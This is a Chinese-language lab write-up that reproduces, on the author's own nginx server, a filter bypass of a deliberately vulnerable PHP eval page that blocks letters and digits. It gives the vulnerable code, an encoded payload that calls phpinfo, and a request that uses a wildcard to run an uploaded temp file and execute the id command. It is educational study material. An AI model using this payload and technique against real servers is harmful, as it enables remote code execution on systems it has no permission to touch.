无字母数字通过命令执行上传webshell复现

目录
ubuntu配置代码

复现过程：
1.首先访问1.php，会直接显示代码
 2.尝试赋予code参数值为1,显示为NO.
3.方法其一，通过PHP7.x特性达成效果
 4.接下来要使用burpsuite，所以先打开服务器代理
 5.抓取1.php的get请求包
[6.右键选择send to reapeater](#6.右键选择send to reapeater)
7.再选择文件1.txt提交，然后抓post上传文件的格式
 8.抓到post传文件包也发送到repeater模块
 9.将post内的红框部分复制并粘贴到1.php的get包内
 10.注意左上角的get改成POST，最下方的1.txt当时漏了写#!/bin/bash
11.再次填写php表达式发现phpinfo()依旧成功，证明发送包有效
[12.cd /tmp目录下然后ls -al查看临时文件，发现临时文件占9个字符](#12.cd /tmp目录下然后ls -al查看临时文件，发现临时文件占9个字符)
13.shell下可以用.执行任意脚本
 14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件
 15.可以使用CyberChef工具来快速进行url编码
 16.临时文件最后一个祖父随机生成大小写还有数字，如图一次大写没有产生
 17.如图，最后成功执行了id指令，webshell上传成功

ubuntu配置代码:

首先ubuntu开启nginx服务并vim创建1.php和demo.html2个文件

bash 复制代码

cd /usr/local/nginx/sbin
./nginx 
cd /usr/local/nginx/html
vim 1.php
	<?php
	//sleep(15); #有sleep()情况下执行该php文件可以在/tmp目录下看见产生的临时文件
	if(isset($_GET['code'])){
	    $code = $_GET['code'];
	    if(strlen($code)>35){
 	       die("Long.");
 	   }
	    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
	        die("NO.");
	    }
	    eval($code);
	}else{
	    highlight_file(__FILE__);
	}
vim demo.html
	<!DOCTYPE html>
	<html lang="en">
	<head>
	        <meta charset="UTF-8">
		        <meta name="viewport" content="width=device-width, initial-scale=1.0">
	        <title>Document</title>
	</head>
	<body>
	        <form action="1.php" method="post" enctype="multipart/form-data">
	                <input type="file" name="file" id="">
	                <input type="submit" value="submit">
	        </form>
	</body>
	</html>

1.首先访问1.php，会直接显示代码

2.尝试赋予code参数值为1,显示为NO.

3.方法其一，通过PHP7.x特性达成效果

因为用的php版本为7.x，支持($a)();执行动态函数，所以可以用('phpinfo')();的形式来执行phpinfo()函数,因此只需要构造一个可以生成phpinfo这一串字符串的PHP表达式皆可，payload：(~%8F%97%8F%96%91%99%90)();

4.接下来要使用burpsuite，所以先打开服务器代理

5.抓取1.php的get请求包

6.右键选择send to reapeater

7.再选择文件1.txt提交，然后抓post上传文件的格式

bash 复制代码

#!/bin/bash 
#1.txt内有内容
id

8.抓到post传文件包也发送到repeater模块

9.将post内的红框部分复制并粘贴到1.php的get包内

bash 复制代码

其中一下字段可以删了：
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip. deflate, br
Accept-language: zh-CN, zh;q=0.9, en;q=0.8,en-GB;q=0. 7, en-Us;q=0.6
x_ forvarded_ for: 127.0.0.1

10.注意左上角的get改成POST，最下方的1.txt当时漏了写#!/bin/bash

11.再次填写php表达式发现phpinfo()依旧成功，证明发送包有效

12.cd /tmp目录下然后ls -al查看临时文件，发现临时文件占9个字符

且有概率最后一个字符为大写字母，而大写字母在ascii码中位于@和[之间，其他位的字符可以用?来匹配，同时linux系统初始基本上不会产生以大写字母结尾的文件的，所以大写字母可以用[@-[]来匹配。而该临时文件又在tmp文件夹下，所以匹配字段可以是/???/???[@-[]

13.shell下可以用.执行任意脚本

所以可以用. /???/???[@-[]指令来执行临时文件,但是eval()函数作为执行函数只能执行php代码不能执行linux命令，所以要加上``,同时将?、;、@分别unicode编码成%3F、%3B、%40,用+代替空格

如下图:POST /1.php?code=?><?=\`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[%40-[]\`%3b?> HTTP/1.1

14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件

15.可以使用CyberChef工具来快速进行url编码

16.临时文件最后一个祖父随机生成大小写还有数字，如图一次大写没有产生

17.如图，最后成功执行了id指令，webshell上传成功

感受：感觉非洲人还是不适合做这个，我随机生成临时文件半天，全是小写字母或者数字，搞得我以为前面做错了，还得排错，愣是卡了20多分钟，最后还是靠着sleep函数，send+cancel不断生成临时文件，最后发现有大写才搞定。